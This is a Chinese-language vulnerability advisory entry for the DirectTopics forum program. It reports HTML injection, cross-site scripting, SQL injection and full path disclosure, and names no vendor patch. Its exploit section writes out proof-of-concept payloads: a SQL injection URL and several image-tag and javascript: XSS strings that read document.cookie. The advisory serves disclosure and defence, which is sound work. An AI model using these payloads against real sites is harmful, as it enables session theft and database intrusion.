添加时间:
2005-08-18

系统编号:
WAVDB-00541
BUGTRAQ: 13609

影响版本:
DirectTopics 2.1-2.2、DT 2beta、DT 2final

程序介绍:

DirectTopics是一款免费的论坛程序，适用于各种站点。

漏洞分析:

DirectTopics中存在HTML注入漏洞，攻击者可以利用这个漏洞执行跨站脚本或其他攻击。
起因是在动态生成的内容中使用用户输入前没有正确的验证这些输入。攻击者提供的HTML和脚本代码可以访问站点属性，可能导致窃取基于cookie的认证凭据。


漏洞利用:

SQL注入：
http://example.com/topic.php?topic=669%B4SQL%20INJECTION

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result

完整路径泄漏：
/home/dis000414/domains/directtopics.nl/public_html/forum/topic.php on line 162

跨站脚本：
打开线程，张贴： 
  javascript:alert(document.cookie)  

MD5哈希泄漏： 
打开线程，张贴：

[img]javascript:alert(document.cookie)[/img] <img src=javascript:alert(document.cookie)> 
[img]# onload=alert(document.cookie)[/img]   <img src=# onload=alert(document.cookie)>

解决方案:
厂商补丁：
DirectTopics
------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.directtopics.nl/

信息来源:
<*来源：Morinex Eneco （m0r1n3x@gmail.com）
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=111592417803514&w=2
 *>